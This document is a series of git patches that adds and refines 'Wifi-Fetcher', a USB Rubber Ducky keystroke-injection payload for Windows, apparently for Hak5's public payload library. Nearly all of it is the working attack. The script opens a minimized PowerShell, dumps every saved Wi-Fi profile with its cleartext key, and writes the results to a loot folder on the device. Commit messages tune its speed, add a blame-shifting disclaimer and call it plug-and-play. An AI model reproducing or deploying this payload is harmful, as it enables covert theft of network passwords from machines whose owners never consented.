From 85a40615805b65aa37e474488a6c27ac50238b20 Mon Sep 17 00:00:00 2001 From: NightCoder-bit <125805141+NightCoder-bit@users.noreply.github.com> Date: Sun, 31 Dec 2023 23:24:19 +0100 Subject: [PATCH 1/9] Create Wifi-Fetcher Adding a payload to the Hak5 liberary --- payloads/library/exfiltration/Wifi-Fetcher | 24 ++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 payloads/library/exfiltration/Wifi-Fetcher diff --git a/payloads/library/exfiltration/Wifi-Fetcher b/payloads/library/exfiltration/Wifi-Fetcher new file mode 100644 index 000000000..fda845f4a --- /dev/null +++ b/payloads/library/exfiltration/Wifi-Fetcher @@ -0,0 +1,24 @@ +REM NAME: Wifi-Fetcher +REM AUTHOR: nightcrafttrl1 +REM DEVICE: RubberDucky +REM TARGETS: WINDOWS 7 or greater +REM DESCRIPTION: This payload will fetch the windows system +REM for the passwords and other info about every wifi network the system can connect to +REM credits:ChatGPT helped a little here and there +DELAY 1000 +REM Switch to HID STORAGE mode +ATTACKMODE HID STORAGE +DELAY 3000 +GUI r +DELAY 100 +STRINGLN cmd +ENTER +DELAY 500 +STRING powershell -c "netsh wlan show profiles | Select-String 'All User Profile\s*:\s*(.+)' | ForEach-Object { $_ -match 'All User Profile\s*:\s*(.+)'; $matches[1] } | ForEach-Object { netsh wlan show profile name=$_ key=clear } | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'; netsh wlan export profile key=clear | Out-File -Append -FilePath 'D:\loot\PwnedWIFI\all_wifi_passwords.txt';" +ENTER +DELAY 3000 +REM Append a 0.5-second delay, exit PowerShell, and turn off DuckyScript +STRING exit +ENTER +DELAY 500 +ATTACKMODE OFF From b46152a80d3b1630f30660c7422e17eb07f09caf Mon Sep 17 00:00:00 2001 From: NightCoder-bit <125805141+NightCoder-bit@users.noreply.github.com> Date: Mon, 1 Jan 2024 00:35:01 +0100 Subject: [PATCH 2/9] Update Wifi-Fetcher --- payloads/library/exfiltration/Wifi-Fetcher | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/exfiltration/Wifi-Fetcher b/payloads/library/exfiltration/Wifi-Fetcher index fda845f4a..e5ce7d75b 100644 --- a/payloads/library/exfiltration/Wifi-Fetcher +++ b/payloads/library/exfiltration/Wifi-Fetcher @@ -5,6 +5,7 @@ REM TARGETS: WINDOWS 7 or greater REM DESCRIPTION: This payload will fetch the windows system REM for the passwords and other info about every wifi network the system can connect to REM credits:ChatGPT helped a little here and there +REM DEPENDENCIES: NONE DELAY 1000 REM Switch to HID STORAGE mode ATTACKMODE HID STORAGE @@ -16,8 +17,7 @@ ENTER DELAY 500 STRING powershell -c "netsh wlan show profiles | Select-String 'All User Profile\s*:\s*(.+)' | ForEach-Object { $_ -match 'All User Profile\s*:\s*(.+)'; $matches[1] } | ForEach-Object { netsh wlan show profile name=$_ key=clear } | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'; netsh wlan export profile key=clear | Out-File -Append -FilePath 'D:\loot\PwnedWIFI\all_wifi_passwords.txt';" ENTER -DELAY 3000 -REM Append a 0.5-second delay, exit PowerShell, and turn off DuckyScript +DELAY 300 STRING exit ENTER DELAY 500 From 8539d67e70e4beeead173f5e2201e7e5756c219e Mon Sep 17 00:00:00 2001 From: NightCoder-bit <125805141+NightCoder-bit@users.noreply.github.com> Date: Mon, 1 Jan 2024 00:35:44 +0100 Subject: [PATCH 3/9] Update Wifi-Fetcher Shortened Overall Runtime --- payloads/library/exfiltration/Wifi-Fetcher | 1 - 1 file changed, 1 deletion(-) diff --git a/payloads/library/exfiltration/Wifi-Fetcher b/payloads/library/exfiltration/Wifi-Fetcher index e5ce7d75b..2e685e2a2 100644 --- a/payloads/library/exfiltration/Wifi-Fetcher +++ b/payloads/library/exfiltration/Wifi-Fetcher @@ -20,5 +20,4 @@ ENTER DELAY 300 STRING exit ENTER -DELAY 500 ATTACKMODE OFF From d6c121950c90c82e925acb15a890161b13b848e0 Mon Sep 17 00:00:00 2001 From: NightCoder-bit <125805141+NightCoder-bit@users.noreply.github.com> Date: Mon, 1 Jan 2024 00:38:01 +0100 Subject: [PATCH 4/9] Update Wifi-Fetcher obfuscation by making the cmd less readable --- payloads/library/exfiltration/Wifi-Fetcher | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/payloads/library/exfiltration/Wifi-Fetcher b/payloads/library/exfiltration/Wifi-Fetcher index 2e685e2a2..81652b0ff 100644 --- a/payloads/library/exfiltration/Wifi-Fetcher +++ b/payloads/library/exfiltration/Wifi-Fetcher @@ -15,9 +15,13 @@ DELAY 100 STRINGLN cmd ENTER DELAY 500 +STRINGLN color FE +DELAY 100 +REM Fetch and Save STRING powershell -c "netsh wlan show profiles | Select-String 'All User Profile\s*:\s*(.+)' | ForEach-Object { $_ -match 'All User Profile\s*:\s*(.+)'; $matches[1] } | ForEach-Object { netsh wlan show profile name=$_ key=clear } | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'; netsh wlan export profile key=clear | Out-File -Append -FilePath 'D:\loot\PwnedWIFI\all_wifi_passwords.txt';" ENTER DELAY 300 STRING exit ENTER +DELAY 500 ATTACKMODE OFF From 6d191f7fd6d69cbd1b009b701f9396198fc55ccd Mon Sep 17 00:00:00 2001 From: NightCoder-bit <125805141+NightCoder-bit@users.noreply.github.com> Date: Mon, 1 Jan 2024 01:00:33 +0100 Subject: [PATCH 5/9] Update Wifi-Fetcher fixed error with Delays . Removed the obfuscation because it was affecting the executiontime too much. also made the script run in only 22 seconds, which means we cut around 15 seconds from the initial script --- payloads/library/exfiltration/Wifi-Fetcher | 14 +++++--------- 1 file changed, 5 insertions(+), 9 deletions(-) diff --git a/payloads/library/exfiltration/Wifi-Fetcher b/payloads/library/exfiltration/Wifi-Fetcher index 81652b0ff..a287e8372 100644 --- a/payloads/library/exfiltration/Wifi-Fetcher +++ b/payloads/library/exfiltration/Wifi-Fetcher @@ -9,19 +9,15 @@ REM DEPENDENCIES: NONE DELAY 1000 REM Switch to HID STORAGE mode ATTACKMODE HID STORAGE -DELAY 3000 +DELAY 4000 GUI r DELAY 100 -STRINGLN cmd +STRING cmd ENTER -DELAY 500 -STRINGLN color FE -DELAY 100 +DELAY 300 REM Fetch and Save STRING powershell -c "netsh wlan show profiles | Select-String 'All User Profile\s*:\s*(.+)' | ForEach-Object { $_ -match 'All User Profile\s*:\s*(.+)'; $matches[1] } | ForEach-Object { netsh wlan show profile name=$_ key=clear } | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'; netsh wlan export profile key=clear | Out-File -Append -FilePath 'D:\loot\PwnedWIFI\all_wifi_passwords.txt';" ENTER -DELAY 300 -STRING exit -ENTER -DELAY 500 +DELAY 3000 +STRINGLN exit ATTACKMODE OFF From 59501f2e622971c5d32156ddfdf116def4da674c Mon Sep 17 00:00:00 2001 From: NightCoder-bit <125805141+NightCoder-bit@users.noreply.github.com> Date: Tue, 2 Jan 2024 23:02:27 +0100 Subject: [PATCH 6/9] Finished Wifi-Fetcher Added DISCLAIMER and INSTRUCTIONS --- payloads/library/exfiltration/Wifi-Fetcher | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/Wifi-Fetcher b/payloads/library/exfiltration/Wifi-Fetcher index a287e8372..6b18db4dc 100644 --- a/payloads/library/exfiltration/Wifi-Fetcher +++ b/payloads/library/exfiltration/Wifi-Fetcher @@ -1,3 +1,9 @@ +REM DISCLAIMER: the end User of the Script IS the only Person Held responsible for the harm or leak of information caused by the payload, Neither the creator of the Script nor the Distribute(Hak5 LLC.) shall BE Held responsible for any damages caused. + + +REM INSTRUCTIONS: IF YOU DONT HAVE THE DIRECTORY D:\loot\PwnedWIFI\ On THE DUCKY, THIS SCRIPT WILL NOT WORK, EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE +REM After creating the directory and adjusting the delays, it IS basically plug 'n play + REM NAME: Wifi-Fetcher REM AUTHOR: nightcrafttrl1 REM DEVICE: RubberDucky @@ -20,4 +26,4 @@ STRING powershell -c "netsh wlan show profiles | Select-String 'All User Profile ENTER DELAY 3000 STRINGLN exit -ATTACKMODE OFF +ATTACKMODE OFF \ No newline at end of file From bbdc188764bb041bdcd69eac8206c3f824fc69ec Mon Sep 17 00:00:00 2001 From: NightCoder-bit <125805141+NightCoder-bit@users.noreply.github.com> Date: Tue, 2 Jan 2024 23:08:12 +0100 Subject: [PATCH 7/9] Finished++ Wifi-Fetcher used DEFINE in the Script for easy adaptabillity --- payloads/library/exfiltration/Wifi-Fetcher | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/payloads/library/exfiltration/Wifi-Fetcher b/payloads/library/exfiltration/Wifi-Fetcher index 6b18db4dc..c273d1f4c 100644 --- a/payloads/library/exfiltration/Wifi-Fetcher +++ b/payloads/library/exfiltration/Wifi-Fetcher @@ -1,18 +1,21 @@ REM DISCLAIMER: the end User of the Script IS the only Person Held responsible for the harm or leak of information caused by the payload, Neither the creator of the Script nor the Distribute(Hak5 LLC.) shall BE Held responsible for any damages caused. - -REM INSTRUCTIONS: IF YOU DONT HAVE THE DIRECTORY D:\loot\PwnedWIFI\ On THE DUCKY, THIS SCRIPT WILL NOT WORK, EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE +REM INSTRUCTIONS: IF YOU DON'T HAVE THE DIRECTORY D:\loot\PwnedWIFI\ ON THE DUCKY, THIS SCRIPT WILL NOT WORK. EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE REM After creating the directory and adjusting the delays, it IS basically plug 'n play +DEFINE DISC "the end User of the Script IS the only Person Held responsible for the harm or leak of information caused by the payload, Neither the creator of the Script nor the Distribute(Hak5 LLC.) shall BE Held responsible for any damages caused." + +DEFINE INSTR "IF YOU DON'T HAVE THE DIRECTORY D:\loot\PwnedWIFI\ ON THE DUCKY, THIS SCRIPT WILL NOT WORK. EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE" + REM NAME: Wifi-Fetcher REM AUTHOR: nightcrafttrl1 REM DEVICE: RubberDucky REM TARGETS: WINDOWS 7 or greater -REM DESCRIPTION: This payload will fetch the windows system -REM for the passwords and other info about every wifi network the system can connect to +REM DESCRIPTION: This payload will fetch the windows system for the passwords and other info about every wifi network the system can connect to REM credits:ChatGPT helped a little here and there REM DEPENDENCIES: NONE DELAY 1000 + REM Switch to HID STORAGE mode ATTACKMODE HID STORAGE DELAY 4000 @@ -21,6 +24,7 @@ DELAY 100 STRING cmd ENTER DELAY 300 + REM Fetch and Save STRING powershell -c "netsh wlan show profiles | Select-String 'All User Profile\s*:\s*(.+)' | ForEach-Object { $_ -match 'All User Profile\s*:\s*(.+)'; $matches[1] } | ForEach-Object { netsh wlan show profile name=$_ key=clear } | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'; netsh wlan export profile key=clear | Out-File -Append -FilePath 'D:\loot\PwnedWIFI\all_wifi_passwords.txt';" ENTER From dc3b5f70e613ff89d639752579488e84e9348e5f Mon Sep 17 00:00:00 2001 From: NightCoder-bit <125805141+NightCoder-bit@users.noreply.github.com> Date: Wed, 3 Jan 2024 00:34:53 +0100 Subject: [PATCH 8/9] Last Update i hope on Wifi-Fetcher Please dont publish it yet as i will have to Test it beforehand,i will make some Last changes in the next 24 hours, then it can BE published to the repo --- payloads/library/exfiltration/Wifi-Fetcher | 11 +++-------- 1 file changed, 3 insertions(+), 8 deletions(-) diff --git a/payloads/library/exfiltration/Wifi-Fetcher b/payloads/library/exfiltration/Wifi-Fetcher index c273d1f4c..e0fcf2085 100644 --- a/payloads/library/exfiltration/Wifi-Fetcher +++ b/payloads/library/exfiltration/Wifi-Fetcher @@ -14,20 +14,15 @@ REM TARGETS: WINDOWS 7 or greater REM DESCRIPTION: This payload will fetch the windows system for the passwords and other info about every wifi network the system can connect to REM credits:ChatGPT helped a little here and there REM DEPENDENCIES: NONE -DELAY 1000 +DELAY 1000 REM Switch to HID STORAGE mode ATTACKMODE HID STORAGE DELAY 4000 GUI r DELAY 100 -STRING cmd +STRING cmd /C start /MIN powershell "netsh wlan show profiles | Select-String 'All User Profile\s*:\s*(.+)' | ForEach-Object { $_ -match 'All User Profile\s*:\s*(.+)'; $matches[1] } | ForEach-Object { netsh wlan show profile name=$_ key=clear } | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'; netsh wlan export profile key=clear | Out-File -Append -FilePath 'D:\loot\PwnedWIFI\all_wifi_passwords.txt';" ENTER -DELAY 300 +DELAY 5000 -REM Fetch and Save -STRING powershell -c "netsh wlan show profiles | Select-String 'All User Profile\s*:\s*(.+)' | ForEach-Object { $_ -match 'All User Profile\s*:\s*(.+)'; $matches[1] } | ForEach-Object { netsh wlan show profile name=$_ key=clear } | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'; netsh wlan export profile key=clear | Out-File -Append -FilePath 'D:\loot\PwnedWIFI\all_wifi_passwords.txt';" -ENTER -DELAY 3000 -STRINGLN exit ATTACKMODE OFF \ No newline at end of file From f5633ed55c7b283cca700396cb45f144844d81ab Mon Sep 17 00:00:00 2001 From: NightCoder-bit <125805141+NightCoder-bit@users.noreply.github.com> Date: Wed, 3 Jan 2024 15:37:02 +0100 Subject: [PATCH 9/9] WE DID IT actually done for now --- payloads/library/exfiltration/Wifi-Fetcher | 34 +++++++++++----------- 1 file changed, 17 insertions(+), 17 deletions(-) diff --git a/payloads/library/exfiltration/Wifi-Fetcher b/payloads/library/exfiltration/Wifi-Fetcher index e0fcf2085..96940c0f3 100644 --- a/payloads/library/exfiltration/Wifi-Fetcher +++ b/payloads/library/exfiltration/Wifi-Fetcher @@ -1,28 +1,28 @@ -REM DISCLAIMER: the end User of the Script IS the only Person Held responsible for the harm or leak of information caused by the payload, Neither the creator of the Script nor the Distribute(Hak5 LLC.) shall BE Held responsible for any damages caused. - -REM INSTRUCTIONS: IF YOU DON'T HAVE THE DIRECTORY D:\loot\PwnedWIFI\ ON THE DUCKY, THIS SCRIPT WILL NOT WORK. EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE -REM After creating the directory and adjusting the delays, it IS basically plug 'n play - -DEFINE DISC "the end User of the Script IS the only Person Held responsible for the harm or leak of information caused by the payload, Neither the creator of the Script nor the Distribute(Hak5 LLC.) shall BE Held responsible for any damages caused." - -DEFINE INSTR "IF YOU DON'T HAVE THE DIRECTORY D:\loot\PwnedWIFI\ ON THE DUCKY, THIS SCRIPT WILL NOT WORK. EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE" - REM NAME: Wifi-Fetcher REM AUTHOR: nightcrafttrl1 REM DEVICE: RubberDucky REM TARGETS: WINDOWS 7 or greater -REM DESCRIPTION: This payload will fetch the windows system for the passwords and other info about every wifi network the system can connect to -REM credits:ChatGPT helped a little here and there +REM DESCRIPTION: This payload will fetch the windows system for the passwords and other info about every wifi network the system can connect to, +REM After creating the directory and adjusting the delays, it IS basically plug 'n play +REM You are safe to plug out the rubber ducky once the minimized powershell windows closes by itself +REM +REM credits:ChatGPT helped a little here and there while debugging REM DEPENDENCIES: NONE - +REM TOTAL_EXEC_TIME: 18.5 seconds (may vary based of taged specifications) +DEFINE DISC "the end User of the Script IS the only Person Held responsible for the harm or leak of information caused by the payload, Neither the creator of the Script nor the Distribute(Hak5 LLC.) shall BE Held responsible for any damages caused." +REM +DEFINE INSTR "IF YOU DON'T HAVE THE DIRECTORY D:\loot\PwnedWIFI\ ON THE DUCKY, THIS SCRIPT WILL NOT WORK. EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE" +REM +REM +REM DELAY 1000 REM Switch to HID STORAGE mode ATTACKMODE HID STORAGE DELAY 4000 GUI r DELAY 100 -STRING cmd /C start /MIN powershell "netsh wlan show profiles | Select-String 'All User Profile\s*:\s*(.+)' | ForEach-Object { $_ -match 'All User Profile\s*:\s*(.+)'; $matches[1] } | ForEach-Object { netsh wlan show profile name=$_ key=clear } | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'; netsh wlan export profile key=clear | Out-File -Append -FilePath 'D:\loot\PwnedWIFI\all_wifi_passwords.txt';" -ENTER -DELAY 5000 - -ATTACKMODE OFF \ No newline at end of file +STRINGLN cmd +DELAY 220 +STRINGLN color FE +DELAY 50 +STRINGLN start /MIN powershell "netsh wlan show profiles | Select-String 'All User Profile\s*:\s*(.+)' | ForEach-Object { $_ -match 'All User Profile\s*:\s*(.+)'; $matches[1] } | ForEach-Object { netsh wlan show profile name=$_ key=clear } | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'; netsh wlan export profile key=clear | Out-File -Append -FilePath 'D:\loot\PwnedWIFI\all_wifi_passwords.txt';" & exit